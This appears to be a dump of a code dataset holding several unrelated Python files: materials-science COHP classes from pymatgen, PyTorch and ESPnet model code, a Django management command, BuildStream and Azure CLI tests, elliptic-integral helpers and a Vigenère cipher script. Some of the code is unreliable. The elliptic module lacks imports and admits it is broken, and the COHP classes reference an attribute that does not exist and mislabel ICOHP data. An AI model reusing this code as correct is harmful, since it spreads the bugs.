content
stringlengths
5
1.05M
# coding: utf-8 # Copyright (c) Pymatgen Development Team. # Distributed under the terms of the MIT License. from __future__ import division, unicode_literals import six import warnings import numpy as np from monty.json import MSONable from pymatgen.electronic_structure.core import Spin, Orbital from pymatgen.core.sites import PeriodicSite from pymatgen.core.structure import Structure from pymatgen.io.lmto import LMTOCopl from pymatgen.io.lobster import Cohpcar from pymatgen.util.num import round_to_sigfigs from pymatgen.util.coord import get_linear_interpolated_value """ This module defines classes to represent crystal orbital Hamilton populations (COHP) and integrated COHP (ICOHP), but can also be used for crystal orbital overlap populations (COOP). """ __author__ = "Marco Esters" __copyright__ = "Copyright 2017, The Materials Project" __version__ = "0.2" __maintainer__ = "Marco Esters" __email__ = "esters@uoregon.edu" __date__ = "Dec 13, 2017" class Cohp(MSONable): """ Basic COHP object. Args/attributes: are_coops: Indicates whether this object describes COHPs or COOPs. efermi: Fermi energy. energies: A sequence of energies. cohp ({Spin: np.array}): representing the COHP for each spin. icohp ({Spin: np.array}): representing the ICOHP for each spin. """ def __init__(self, efermi, energies, cohp, are_coops=False, icohp=None): self.are_coops = are_coops self.efermi = efermi self.energies = np.array(energies) self.cohp = cohp self.icohp = icohp def __add__(self, other): """ Adds two COHP together. Checks that energy scales are the same. Otherwise, it raises a ValueError. It also adds ICOHP if present. If ICOHP is only present in one object, it displays a warning and will not add ICOHP. Args: other: Another COHP object. Returns: Sum of the two COHPs as a COHP object. """ if not all(np.equal(self.energies, other.energies)): raise ValueError("Energies of both COHP are not compatible.") populations = {spin: self.populations[spin] + other.populations[spin] for spin in self.cohp} if self.icohp is not None and other.icohp is not None: int_pop = {spin: self.icohp[spin] + other.icohp[spin] for spin in self.icohp} else: if self.icohp is not None or other.icohp is not None: warnings.warn("One of the COHP objects does not contain " "ICOHPs. Setting ICOHP to None.") int_pop = None return Cohp(self.efermi, self.energies, populations, icohp=int_pop) def __repr__(self): return self.__str__() def __str__(self): """ Returns a string that can be easily plotted (e.g. using gnuplot). """ cohpstring = "COOP" if self.are_coops else "COHP" header = ["Energy", cohpstring + "Up"] data = [self.energies, self.cohp[Spin.up]] if Spin.down in self.cohp: header.append(cohpstring + "Down") data.append(self.cohp[Spin.down]) if self.icohp: header.append("I" + cohpstring + "Up") data.append(self.icohp[Spin.up]) if Spin.down in self.cohp: header.append("I" + cohpstring + "Down") data.append(self.icohp[Spin.down]) formatheader = "#" + " ".join(["{:15s}" for __ in header]) formatdata = " ".join(["{:.5f}" for __ in header]) stringarray = [formatheader.format(*header)] for i, __ in enumerate(self.energies): stringarray.append(formatdata.format(*[d[i] for d in data])) return "\n".join(stringarray) def as_dict(self): """ Json-serializable dict representation of COHP. """ d = {"@module": self.__class__.__module__, "@class": self.__class__.__name__, "are_coops": self.are_coops, "efermi": self.efermi, "energies": self.energies.tolist(), "COHP": {str(spin): pops.tolist() for spin, pops in self.cohp.items()}} if self.icohp: d["ICOHP"] = {str(spin): pops.tolist() for spin, pops in self.icohp.items()} return d def get_cohp(self, spin=None, integrated=False): """ Returns the COHP or ICOHP for a particular spin. Args: spin: Spin. Can be parsed as spin object, integer (-1/1) or str ("up"/"down") integrated: Return COHP (False) or ICOHP (True) Returns: Returns the CHOP or ICOHP for the input spin. If Spin is None and both spins are present, both spins will be returned as a dictionary. """ if not integrated: populations = self.cohp else: populations = self.icohp if populations is None: return None elif spin is None: return populations else: if isinstance(spin, six.integer_types): spin = Spin(spin) elif isinstance(spin, six.string_types): s = {"up": 1, "down": -1}[spin.lower()] spin = Spin(s) return {spin: populations[spin]} def get_icohp(self, spin=None): """ Convenient alternative to get the ICOHP for a particular spin. """ return self.get_cohp(spin=spin, integrated=True) def get_interpolated_value(self, energy, integrated=False): """ Returns the COHP for a particular energy. Args: energy: Energy to return the COHP value for. """ inter = {} for spin in self.cohp: if not integrated: inter[spin] = get_linear_interpolated_value(self.energies, self.cohp[spin], energy) elif self.icohp is not None: inter[spin] = get_linear_interpolated_value(self.energies, self.icohp[spin], energy) else: raise ValueError("ICOHP is empty.") return inter @classmethod def from_dict(cls, d): """ Returns a COHP object from a dict representation of the COHP. """ if "ICOHP" in d: icohp = {Spin(int(key)): np.array(val) for key, val in d["ICOHP"].items()} else: icohp = None return Cohp(d["efermi"], d["energies"], {Spin(int(key)): np.array(val) for key, val in d["COHP"].items()}, icohp=icohp, are_coops=d["are_coops"]) class CompleteCohp(Cohp): """ A wrapper class that defines an average COHP, and individual COHPs. Args: structure: Structure assosciated with this COHP. avg_cohp: The average cohp as a COHP object. cohps: A dict of COHP objects for individual bonds of the form {label: COHP} bonds: A dict containing information on the bonds of the form {label: {key: val}}. The key-val pair can be any information the user wants to put in, but typically contains the sites, the bond length, and the number of bonds. If nothing is supplied, it will default to an empty dict. are_coops: indicates whether the Cohp objects are COHPs or COOPs. Defauls to False for COHPs. orb_res_cohp: Orbital-resolved COHPs. .. attribute: are_coops Indicates whether the object is of COOPs or COHPs. .. attribute: efermi Fermi energy .. attribute: energies Sequence of energies .. attribute: structure Structure associated with the COHPs. .. attribute: cohp, icohp The average COHP/ICOHP. .. attribute: all_cohps A dict of COHPs for individual bonds of the form {label: COHP} .. attribute: orb_res_cohp Orbital-resolved COHPs. """ def __init__(self, structure, avg_cohp, cohp_dict, bonds=None, are_coops=False, orb_res_cohp=None): super(CompleteCohp, self).__init__(avg_cohp.efermi, avg_cohp.energies, avg_cohp.cohp, are_coops=are_coops, icohp=avg_cohp.icohp) self.structure = structure self.are_coops = are_coops self.all_cohps = cohp_dict self.orb_res_cohp = orb_res_cohp if bonds is None: self.bonds = {label: {} for label in self.all_cohps.keys()} else: self.bonds = bonds def __str__(self): if self.are_coops: return "Complete COOPs for " + str(self.structure) else: return "Complete COHPs for " + str(self.structure) def as_dict(self): """ Json-serializable dict representation of CompleteCohp. """ d = {"@module": self.__class__.__module__, "@class": self.__class__.__name__, "are_coops": self.are_coops, "efermi": self.efermi, "structure": self.structure.as_dict(), "energies": self.energies.tolist(), "COHP": {"average": {str(spin): pops.tolist() for spin, pops in self.cohp.items()}}} if self.icohp is not None: d["ICOHP"] = {"average": {str(spin): pops.tolist() for spin, pops in self.icohp.items()}} for label in self.all_cohps.keys(): d["COHP"].update({label: {str(spin): pops.tolist() for spin, pops in self.all_cohps[label].cohp.items()}}) if self.all_cohps[label].icohp is not None: if "ICOHP" not in d.keys(): d["ICOHP"] = {label: {str(spin): pops.tolist() for spin, pops in self.all_cohps[label].icohp.items()}} else: d["ICOHP"].update({label: {str(spin): pops.tolist() for spin, pops in self.all_cohps[label].icohp.items()}}) if False in [bond_dict == {} for bond_dict in self.bonds.values()]: d["bonds"] = {bond: {"length": self.bonds[bond]["length"], "sites": [site.as_dict() for site in self.bonds[bond]["sites"]]} for bond in self.bonds} if self.orb_res_cohp: orb_dict = {} for label in self.orb_res_cohp: orb_dict[label] = {} for orbs in self.orb_res_cohp[label]: cohp = {str(spin): pops.tolist() for spin, pops in self.orb_res_cohp[label][orbs]["COHP"].items()} orb_dict[label][orbs] = {"COHP": cohp} icohp = {str(spin): pops.tolist() for spin, pops in self.orb_res_cohp[label][orbs]["ICOHP"].items()} orb_dict[label][orbs]["ICOHP"] = icohp orbitals = [[orb[0], orb[1].name] for orb in self.orb_res_cohp[label][orbs]["orbitals"]] orb_dict[label][orbs]["orbitals"] = orbitals d["orb_res_cohp"] = orb_dict return d def get_cohp(self, label, spin=None, integrated=False): """ Get specific COHP or ICOHP. If label is not in the COHP labels, try reversing the order of the sites. Args: spin: Spin. Can be parsed as spin object, integer (-1/1) or str ("up"/"down") integrated: Return COHP (False) or ICOHP (True) Returns: Returns the CHOP or ICOHP for the input spin. If Spin is None and both spins are present, both spins will be returned as a dictionary. """ if label.lower() == "average": return self.cohp.get_cohp(spin=spin, integrated=integrated) else: try: return self.all_cohps[label].get_cohp(spin=spin, integrated=integrated) except KeyError: atoms = label.split("-") label = atoms[1] + "-" + atoms[0] return self.all_cohps[label].get_cohp(spin=spin, integrated=integrated) def get_icohp(self, label, spin=None): """ Convenient alternative to get a specific ICOHP. """ return self.get_cohp(label, spin=spin, integrated=True) def get_orbital_resolved_cohp(self, label, orbitals): """ Get orbital-resolved COHP. Args: label: bond label. orbitals: The orbitals as a label, or list or tuple of the form [(n1, orbital1), (n2, orbital2)]. Orbitals can either be str, int, or Orbital. Returns: A Cohp object if CompleteCohp contains orbital-resolved cohp, or None if it doesn't. Note: It currently assumes that orbitals are str if they aren't the other valid types. This is not ideal, but the easiest way to avoid unicode issues between python 2 and python 3. """ if self.orb_res_cohp is None: return None elif isinstance(orbitals, list) or isinstance(orbitals, tuple): cohp_orbs = [d["orbitals"] for d in self.orb_res_cohp[label].values()] orbs = [] for orbital in orbitals: if isinstance(orbital[1], int): orbs.append(tuple((orbital[0], Orbital(orbital[1])))) elif isinstance(orbital[1], Orbital): orbs.append(tuple((orbital[0], orbital[1]))) elif isinstance(orbital[1], six.string_types): orbs.append(tuple((orbital[0], Orbital[orbital[1]]))) else: raise TypeError("Orbital must be str, int, or Orbital.") orb_index = cohp_orbs.index(orbs) orb_label = list(self.orb_res_cohp[label].keys())[orb_index] elif isinstance(orbitals, six.string_types): orb_label = orbitals else: raise TypeError("Orbitals must be str, list, or tuple.") try: icohp = self.orb_res_cohp[label][orb_label]["ICOHP"] except KeyError: icohp = None return Cohp(self.efermi, self.energies, self.orb_res_cohp[label][orb_label]["COHP"], icohp=icohp, are_coops=self.are_coops) @classmethod def from_dict(cls, d): """ Returns CompleteCohp object from dict representation. """ cohp_dict = {} efermi = d["efermi"] energies = d["energies"] structure = Structure.from_dict(d["structure"]) if "bonds" in d.keys(): bonds = {bond: {"length": d["bonds"][bond]["length"], "sites": tuple(PeriodicSite.from_dict(site) for site in d["bonds"][bond]["sites"])} for bond in d["bonds"]} else: bonds = None for label in d["COHP"]: cohp = {Spin(int(spin)): np.array(d["COHP"][label][spin]) for spin in d["COHP"][label]} try: icohp = {Spin(int(spin)): np.array(d["ICOHP"][label][spin]) for spin in d["ICOHP"][label]} except KeyError: icohp = None if label == "average": avg_cohp = Cohp(efermi, energies, cohp, icohp=icohp) else: cohp_dict[label] = Cohp(efermi, energies, cohp, icohp=icohp) if "orb_res_cohp" in d.keys(): orb_cohp = {} for label in d["orb_res_cohp"]: orb_cohp[label] = {} for orb in d["orb_res_cohp"][label]: cohp = {Spin(int(s)): np.array( d["orb_res_cohp"][label][orb]["COHP"][s], dtype=float) for s in d["orb_res_cohp"][label][orb]["COHP"]} try: icohp = {Spin(int(s)): np.array( d["orb_res_cohp"][label][orb]["ICOHP"][s], dtype=float) for s in d["orb_res_cohp"][label][orb]["ICOHP"]} except KeyError: icohp = None orbitals = [tuple((int(o[0]), Orbital[o[1]])) for o in d["orb_res_cohp"][label][orb]["orbitals"]] orb_cohp[label][orb] = {"COHP": cohp, "ICOHP": icohp, "orbitals": orbitals} # If no total COHPs are present, calculate the total # COHPs from the single-orbital populations. Total COHPs # may not be present when the cohpgenerator keyword is used # in LOBSTER versions 2.2.0 and earlier. if label not in d["COHP"] or d["COHP"][label] is None: cohp = {Spin.up: np.sum(np.array( [orb_cohp[label][orb]["COHP"][Spin.up] for orb in orb_cohp[label]]), axis=0)} try: cohp[Spin.down] = np.sum(np.array( [orb_cohp[label][orb]["COHP"][Spin.down] for orb in orb_cohp[label]]), axis=0) except KeyError: pass orb_res_icohp = None in [orb_cohp[label][orb]["ICOHP"] for orb in orb_cohp[label]] if (label not in d["ICOHP"] or d["ICOHP"][label] is None) and orb_res_icohp: icohp = {Spin.up: np.sum(np.array( [orb_cohp[label][orb]["ICOHP"][Spin.up] for orb in orb_cohp[label]]), axis=0)} try: icohp[Spin.down] = np.sum(np.array( [orb_cohp[label][orb]["ICOHP"][Spin.down] for orb in orb_cohp[label]]), axis=0) except KeyError: pass else: orb_cohp = None if "average" not in d["COHP"].keys(): # calculate average cohp = np.array([np.array(c) for c in d["COHP"].values()]).mean(axis=0) try: icohp = np.array([np.array(c) for c in d["ICOHP"].values()]).mean(axis=0) except KeyError: icohp = None avg_cohp = Cohp(efermi, energies, cohp, icohp=icohp) return CompleteCohp(structure, avg_cohp, cohp_dict, bonds=bonds, are_coops=d["are_coops"], orb_res_cohp=orb_cohp) @classmethod def from_file(cls, fmt, filename=None, structure_file=None, are_coops=False): """ Creates a CompleteCohp object from an output file of a COHP calculation. Valid formats are either LMTO (for the Stuttgart LMTO-ASA code) or LOBSTER (for the LOBSTER code). Args: cohp_file: Name of the COHP output file. Defaults to COPL for LMTO and COHPCAR.lobster/COOPCAR.lobster for LOBSTER. are_coops: Indicates whether the populations are COOPs or COHPs. Defaults to False for COHPs. fmt: A string for the code that was used to calculate the COHPs so that the output file can be handled correctly. Can take the values "LMTO" or "LOBSTER". structure_file: Name of the file containing the structure. If no file name is given, use CTRL for LMTO and POSCAR for LOBSTER. Returns: A CompleteCohp object. """ fmt = fmt.upper() if fmt == "LMTO": # LMTO COOPs and orbital-resolved COHP cannot be handled yet. are_coops = False orb_res_cohp = None if structure_file is None: structure_file = "CTRL" if filename is None: filename = "COPL" cohp_file = LMTOCopl(filename=filename, to_eV=True) elif fmt == "LOBSTER": if structure_file is None: structure_file = "POSCAR" if filename is None: filename = "COOPCAR.lobster" if are_coops \ else "COHPCAR.lobster" cohp_file = Cohpcar(filename=filename, are_coops=are_coops) orb_res_cohp = cohp_file.orb_res_cohp else: raise ValueError("Unknown format %s. Valid formats are LMTO " "and LOBSTER." % fmt) structure = Structure.from_file(structure_file) efermi = cohp_file.efermi cohp_data = cohp_file.cohp_data energies = cohp_file.energies # Lobster shifts the energies so that the Fermi energy is at zero. # Shifting should be done by the plotter object though. spins = [Spin.up, Spin.down] if cohp_file.is_spin_polarized \ else [Spin.up] if fmt == "LOBSTER": energies += efermi if orb_res_cohp is not None: # If no total COHPs are present, calculate the total # COHPs from the single-orbital populations. Total COHPs # may not be present when the cohpgenerator keyword is used # in LOBSTER versions 2.2.0 and earlier. for label in orb_res_cohp: if cohp_file.cohp_data[label]["COHP"] is None: cohp_data[label]["COHP"] = \ {sp: np.sum([orb_res_cohp[label][orbs]["COHP"][sp] for orbs in orb_res_cohp[label]], axis=0) for sp in spins} if cohp_file.cohp_data[label]["ICOHP"] is None: cohp_data[label]["ICOHP"] = \ {sp: np.sum([orb_res_cohp[label][orbs]["ICOHP"][sp] for orbs in orb_res_cohp[label]], axis=0) for sp in spins} if fmt == "LMTO": # Calculate the average COHP for the LMTO file to be # consistent with LOBSTER output. avg_data = {"COHP": {}, "ICOHP": {}} for i in avg_data: for spin in spins: rows = np.array([cohp_data[label][i][spin] for label in cohp_data]) avg = np.average(rows, axis=0) # LMTO COHPs have 5 significant figures avg_data[i].update({spin: np.array([round_to_sigfigs(a, 5) for a in avg], dtype=float)}) avg_cohp = Cohp(efermi, energies, avg_data["COHP"], icohp=avg_data["ICOHP"]) else: avg_cohp = Cohp(efermi, energies, cohp_data["average"]["COHP"], icohp=cohp_data["average"]["COHP"], are_coops=are_coops) del cohp_data["average"] cohp_dict = {label: Cohp(efermi, energies, cohp_data[label]["COHP"], icohp=cohp_data[label]["ICOHP"], are_coops=are_coops) for label in cohp_data} bond_dict = {label: {"length": cohp_data[label]["length"], "sites": [structure.sites[site] for site in cohp_data[label]["sites"]]} for label in cohp_data} return CompleteCohp(structure, avg_cohp, cohp_dict, bonds=bond_dict, are_coops=are_coops, orb_res_cohp=orb_res_cohp)
#!/usr/bin/env python import torch as th from torch import Tensor as T from torch.autograd import Variable as V from lstms import LayerNorm, LSTM, LayerNormLSTM if __name__ == '__main__': th.manual_seed(1234) # vec = T(1, 1, 5).fill_(1.0) vec = V(th.rand(1, 1, 5)) ln = LayerNorm(5, learnable=False) print(ln(vec)) ln = LayerNorm(5, learnable=True) print(ln(vec)) for p in ln.parameters(): print(p) lstm = LSTM(5, 5) asdf, (a, e) = lstm(ln(vec), (vec, vec)) print(asdf)
MEAN_TOLERANCE = 1.e-10 def ag_mean(a,b,tolerance): ''' Computes arithmetic-geometric mean of A and B https://scipython.com/book/chapter-2-the-core-python-language-i/questions/the-arithmetic-geometric-mean/ ''' while abs(a-b) > tolerance: a, b = (a + b) / 2.0, math.sqrt(a * b) return b def first_kind_elliptic_integral(k): ''' Calculate K(k) - okay? https://dlmf.nist.gov/19 §19.8(i) Gauss’s Arithmetic-Geometric Mean (AGM) ''' return (math.pi/2.0)/ag_mean(1,math.sqrt(1.0-(k**2.0)), MEAN_TOLERANCE) def compute_big_M(m): ''' Prerequisite for E(m) ''' return (math.pi/(2.0*first_kind_elliptic_integral(m)*math.sqrt(1-m**2.0))) def compute_delta(m): ''' Prerequisite for E(m) ''' return (1.0/math.sqrt(1.0-(m**2.0))) def differentiate_delta_over_M(m): ''' Another prerequisite for E(m) Numerically differentiate the quotient delta/M ''' dm=1.0e-6 return (((compute_delta(m+dm)/compute_big_M(m+dm))-(compute_delta(m)/compute_big_M(m)))/dm) def second_kind_elliptic_integral(m): ''' Calculate E(m)inem E says blow, we increase emittance receive remittance percieve: society's been enhanced oh we got them in a trance science's now advanced in common parlance: dance From @ kurzweg2012 Efficiency could be improved by eliminating duplicate calls of big_M and compute_delta(m) Currently slightly broken. ''' return (math.pi/2.0)/((1.0/(compute_big_M(m)*compute_delta(m))) + (m*differentiate_delta_over_M(m))) class TestAll(unittest.TestCase): def test_ag_mean(self): self.assertAlmostEqual(ag_mean(24,6,1e-7), 13.458, places=3) def test_first_kind_elliptic_integral(self): self.assertAlmostEqual(first_kind_elliptic_integral(0.5), 1.685751, places=3) self.assertAlmostEqual(first_kind_elliptic_integral(0), 1.57079632, places=3) def test_big_M(self): self.assertAlmostEqual(compute_big_M(0.5), 1.07595, places=3) def test_differentiate_delta_over_M(self): self.assertAlmostEqual(differentiate_delta_over_M(0), 1.6, places=3) self.assertAlmostEqual(differentiate_delta_over_M(0.9), 1.6, places=3) def test_second_kind_elliptic_integral(self): self.assertAlmostEqual(second_kind_elliptic_integral(0), 1.5707963, places=3) self.assertAlmostEqual(second_kind_elliptic_integral(0.9), 1.15, places=3)
from django.core.management.base import BaseCommand, CommandError from TaskScheduler.models import Blocked from prompt_toolkit import prompt from datetime import datetime import pytz # from prompt_toolkit.contrib.completers import WordCompleter class Command(BaseCommand): help = 'Creates a new task to schedule' def add_arguments(self, parser): parser.add_argument('type', nargs='+', type=str) parser.add_argument('filter_value', nargs='+', type=str) print() def handle(self, *args, **options): for option in options["type"]: if option == "id": for blocked_id in options["filter_value"]: b = Blocked.objects.get(pk=int(blocked_id)) delete = prompt("> Delete? (y-yes)") if delete == "y" or delete == "Y": print("Deleting blocked!") b.delete() elif option == "name": for name in options["filter_value"]: blocked = Blocked.objects.all().filter(name=name) for b in blocked: delete = prompt("> Delete"+b.name+", id: "+str(b.id)+"? (y-yes)") if delete == "y" or delete == "Y": print("Deleting blocked!") b.delete() self.stdout.write(self.style.SUCCESS("Successfully deleted blocked"))
from hacker.settings import USERNAME print(USERNAME[::-1])
# Pylint doesn't play well with fixtures and dependency injection from pytest # pylint: disable=redefined-outer-name import os import pytest from buildstream.exceptions import ErrorDomain, LoadErrorReason from buildstream._testing.runcli import cli # pylint: disable=unused-import # Project directory DATA_DIR = os.path.dirname(os.path.realpath(__file__)) @pytest.mark.datafiles(DATA_DIR) def test_project_error(cli, datafiles): project = os.path.join(datafiles.dirname, datafiles.basename, "list-directive-error-project") result = cli.run( project=project, silent=True, args=["show", "--deps", "none", "--format", "%{vars}", "element.bst"] ) result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.TRAILING_LIST_DIRECTIVE) @pytest.mark.datafiles(DATA_DIR) @pytest.mark.parametrize("target", [("variables.bst"), ("environment.bst"), ("config.bst"), ("public.bst")]) def test_element_error(cli, datafiles, target): project = os.path.join(datafiles.dirname, datafiles.basename, "list-directive-error-element") result = cli.run(project=project, silent=True, args=["show", "--deps", "none", "--format", "%{vars}", target]) result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.TRAILING_LIST_DIRECTIVE) @pytest.mark.datafiles(DATA_DIR) def test_project_composite_error(cli, datafiles): project = os.path.join(datafiles.dirname, datafiles.basename, "list-directive-type-error") result = cli.run( project=project, silent=True, args=["show", "--deps", "none", "--format", "%{vars}", "element.bst"] ) result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.ILLEGAL_COMPOSITE)
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- import os import tempfile import unittest from unittest.mock import MagicMock from azure.cli.testsdk import ScenarioTest, LocalContextScenarioTest from knack.util import CLIError class ConfigTest(ScenarioTest): def test_config(self): # [test_section1] # test_option1 = test_value1 # # [test_section2] # test_option21 = test_value21 # test_option22 = test_value22 # C:\Users\{username}\AppData\Local\Temp tempdir = tempfile.gettempdir() original_path = os.getcwd() os.chdir(tempdir) print("Using temp dir: {}".format(tempdir)) global_test_args = {"source": os.path.expanduser(os.path.join('~', '.azure', 'config')), "flag": ""} local_test_args = {"source": os.path.join(tempdir, '.azure', 'config'), "flag": " --local"} for args in (global_test_args, local_test_args): test_option1_expected = {'name': 'test_option1', 'source': args["source"], 'value': 'test_value1'} test_option21_expected = {'name': 'test_option21', 'source': args["source"], 'value': 'test_value21'} test_option22_expected = {'name': 'test_option22', 'source': args["source"], 'value': 'test_value22'} test_section1_expected = [test_option1_expected] test_section2_expected = [test_option21_expected, test_option22_expected] # 1. set # Test setting one option self.cmd('config set test_section1.test_option1=test_value1' + args['flag']) # Test setting multiple options self.cmd('config set test_section2.test_option21=test_value21 test_section2.test_option22=test_value22' + args['flag']) # 2. get # 2.1 Test get all sections output = self.cmd('config get' + args['flag']).get_output_in_json() self.assertListEqual(output['test_section1'], test_section1_expected) self.assertListEqual(output['test_section2'], test_section2_expected) # 2.2 Test get one section output = self.cmd('config get test_section1' + args['flag']).get_output_in_json() self.assertListEqual(output, test_section1_expected) output = self.cmd('config get test_section2' + args['flag']).get_output_in_json() self.assertListEqual(output, test_section2_expected) # 2.3 Test get one item output = self.cmd('config get test_section1.test_option1' + args['flag']).get_output_in_json() self.assertDictEqual(output, test_option1_expected) output = self.cmd('config get test_section2.test_option21' + args['flag']).get_output_in_json() self.assertDictEqual(output, test_option21_expected) output = self.cmd('config get test_section2.test_option22' + args['flag']).get_output_in_json() self.assertDictEqual(output, test_option22_expected) with self.assertRaises(CLIError): self.cmd('config get test_section1.test_option22' + args['flag']) # 3. unset # Test unsetting one option self.cmd('config unset test_section1.test_option1' + args['flag']) # Test unsetting multiple options self.cmd('config unset test_section2.test_option21 test_section2.test_option22' + args['flag']) os.chdir(original_path) if __name__ == '__main__': unittest.main()
#!/usr/bin/env python ''' VIGENERE SQUARE: a b c d e f g h i j k l m n o p q r s t u v w x y z b c d e f g h i j k l m n o p q r s t u v w x y z a c d e f g h i j k l m n o p q r s t u v w x y z a b d e f g h i j k l m n o p q r s t u v w x y z a b c e f g h i j k l m n o p q r s t u v w x y z a b c d f g h i j k l m n o p q r s t u v w x y z a b c d e g h i j k l m n o p q r s t u v w x y z a b c d e f h i j k l m n o p q r s t u v w x y z a b c d e f g i j k l m n o p q r s t u v w x y z a b c d e f g h j k l m n o p q r s t u v w x y z a b c d e f g h i k l m n o p q r s t u v w x y z a b c d e f g h i j l m n o p q r s t u v w x y z a b c d e f g h i j k m n o p q r s t u v w x y z a b c d e f g h i j k l n o p q r s t u v w x y z a b c d e f g h i j k l m o p q r s t u v w x y z a b c d e f g h i j k l m n p q r s t u v w x y z a b c d e f g h i j k l m n o q r s t u v w x y z a b c d e f g h i j k l m n o p r s t u v w x y z a b c d e f g h i j k l m n o p q s t u v w x y z a b c d e f g h i j k l m n o p q r t u v w x y z a b c d e f g h i j k l m n o p q r s u v w x y z a b c d e f g h i j k l m n o p q r s t v w x y z a b c d e f g h i j k l m n o p q r s t u w x y z a b c d e f g h i j k l m n o p q r s t u v y z a b c d e f g h i j k l m n o p q r s t u v w x z a b c d e f g h i j k l m n o p q r s t u v w x y ''' import sys import argparse def main(): args = get_args() final = vigenere_shift(args) print final def clean(message, key): ''' Clean our message and key so they're pretty. :param dictionary: args See rot13 for description ''' dirty_text = list(message) # [97-122] dirty_key = list(key) def num_det(letter): if ord(letter.lower()) >= 97 and ord(letter.lower()) <= 122: return letter.lower() else: return '' clean_text = ''.join([num_det(char) for char in dirty_text]) clean_key = [ord(character) for character in list(''.join([num_det(char) for char in dirty_key]))] return clean_text, clean_key def vigenere_shift(args): ''' Shift our message and return :param dictionary: args ''' clean_text, clean_key = clean(args.message, args.key) letter = 0 ciphertext = '' for byte in clean_text: chr_enc = shift_byte(byte, clean_key[letter], args.decrypt) ciphertext += chr_enc letter = (letter + 1) % len(clean_key) # Cycle keyword return ciphertext def shift_byte(byte, shift, decrypt): ''' Shift our byte using the correct alphabet in the correct direction :param string: byte :param int: shift :param decrypt: bool See rot13 for description ''' nRangeByte = (ord(byte) + 7) % 26 nRangeShift = (shift + 7) % 26 if decrypt: encoded_byte = chr(((nRangeByte - nRangeShift) % 26) + 97) else: encoded_byte = chr(((nRangeByte + nRangeShift) % 26) + 97) return encoded_byte def get_args(): default_message = 'The Quick Brown fox lept Over THE lazy dog' parser = argparse.ArgumentParser() parser.add_argument('-e', '--encrypt', action='store_true', help='Encrypt') parser.add_argument('-d', '--decrypt', action='store_true', help='Decrypt') parser.add_argument('-k', '--key', type=str, default='Ki5Ng', help='The keyword for encryption or decryption') parser.add_argument('-f', '--filename', type=str, default=None, help='This is the name of the read/write file') parser.add_argument('-m', '--message', type=str, default=default_message, help='Message to encode') args = parser.parse_args() if args.encrypt is False and args.decrypt is False: args.encrypt = True if args.decrypt and args.message is default_message: args.message = 'dprweqpqlzbcxnbdvmczydrxdprrkhljyo' if args.filename: args.message = open(args.filename, 'r').read() return args if __name__ == "__main__": sys.exit(main())
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Copyright 2019 Hang Le (hangtp.le@gmail.com) """Dual-decoder definition.""" import logging import torch from torch import nn from espnet.nets.pytorch_backend.transformer.attention import MultiHeadedAttention from espnet.nets.pytorch_backend.transformer.decoder_layer_dual import DualDecoderLayer from espnet.nets.pytorch_backend.transformer.embedding import PositionalEncoding from espnet.nets.pytorch_backend.transformer.layer_norm import LayerNorm from espnet.nets.pytorch_backend.transformer.mask import subsequent_mask from espnet.nets.pytorch_backend.transformer.positionwise_feed_forward import PositionwiseFeedForward from espnet.nets.pytorch_backend.transformer.repeat import repeat from espnet.nets.scorer_interface import ScorerInterface from espnet.nets.pytorch_backend.transformer.adapter import Adapter class DualDecoder(ScorerInterface, torch.nn.Module): """Transfomer decoder module. :param int odim: output dim :param int attention_dim: dimention of attention :param int attention_heads: the number of heads of multi head attention :param int linear_units: the number of units of position-wise feed forward :param int num_blocks: the number of decoder blocks :param float dropout_rate: dropout rate :param float attention_dropout_rate: dropout rate for attention :param str or torch.nn.Module input_layer: input layer type :param bool use_output_layer: whether to use output layer :param class pos_enc_class: PositionalEncoding or ScaledPositionalEncoding :param bool normalize_before: whether to use layer_norm before the first block :param bool concat_after: whether to concat attention layer's input and output if True, additional linear will be applied. i.e. x -> x + linear(concat(x, att(x))) if False, no additional linear will be applied. i.e. x -> x + att(x) """ def __init__(self, odim_tgt, odim_src, attention_dim=256, attention_heads=4, linear_units=2048, num_blocks=6, dropout_rate=0.1, positional_dropout_rate=0.1, self_attention_dropout_rate=0.0, src_attention_dropout_rate=0.0, input_layer="embed", use_output_layer=True, pos_enc_class=PositionalEncoding, normalize_before=True, concat_after=False, cross_operator=None, cross_weight_learnable=False, cross_weight=0.0, cross_self=False, cross_src=False, cross_to_asr=True, cross_to_st=True, adapter_names=None, reduction_factor=8, ): """Construct an Decoder object.""" torch.nn.Module.__init__(self) if input_layer == "embed": self.embed = torch.nn.Sequential( torch.nn.Embedding(odim_tgt, attention_dim), pos_enc_class(attention_dim, positional_dropout_rate) ) self.embed_asr = torch.nn.Sequential( torch.nn.Embedding(odim_src, attention_dim), pos_enc_class(attention_dim, positional_dropout_rate) ) elif input_layer == "linear": self.embed = torch.nn.Sequential( torch.nn.Linear(odim_tgt, attention_dim), torch.nn.LayerNorm(attention_dim), torch.nn.Dropout(dropout_rate), torch.nn.ReLU(), pos_enc_class(attention_dim, positional_dropout_rate) ) self.embed_asr = torch.nn.Sequential( torch.nn.Linear(odim_src, attention_dim), torch.nn.LayerNorm(attention_dim), torch.nn.Dropout(dropout_rate), torch.nn.ReLU(), pos_enc_class(attention_dim, positional_dropout_rate) ) elif isinstance(input_layer, torch.nn.Module): self.embed = torch.nn.Sequential( input_layer, pos_enc_class(attention_dim, positional_dropout_rate) ) self.embed_asr = torch.nn.Sequential( input_layer, pos_enc_class(attention_dim, positional_dropout_rate) ) else: raise NotImplementedError("only `embed` or torch.nn.Module is supported.") self.normalize_before = normalize_before self.adapter_names = adapter_names self.dual_decoders = repeat( num_blocks, lambda: DualDecoderLayer( attention_dim, attention_dim, MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate), MultiHeadedAttention(attention_heads, attention_dim, src_attention_dropout_rate), PositionwiseFeedForward(attention_dim, linear_units, dropout_rate), MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate), MultiHeadedAttention(attention_heads, attention_dim, src_attention_dropout_rate), PositionwiseFeedForward(attention_dim, linear_units, dropout_rate), cross_self_attn=MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate) if (cross_self and cross_to_st) else None, cross_self_attn_asr=MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate) if (cross_self and cross_to_asr) else None, cross_src_attn=MultiHeadedAttention(attention_heads, attention_dim, 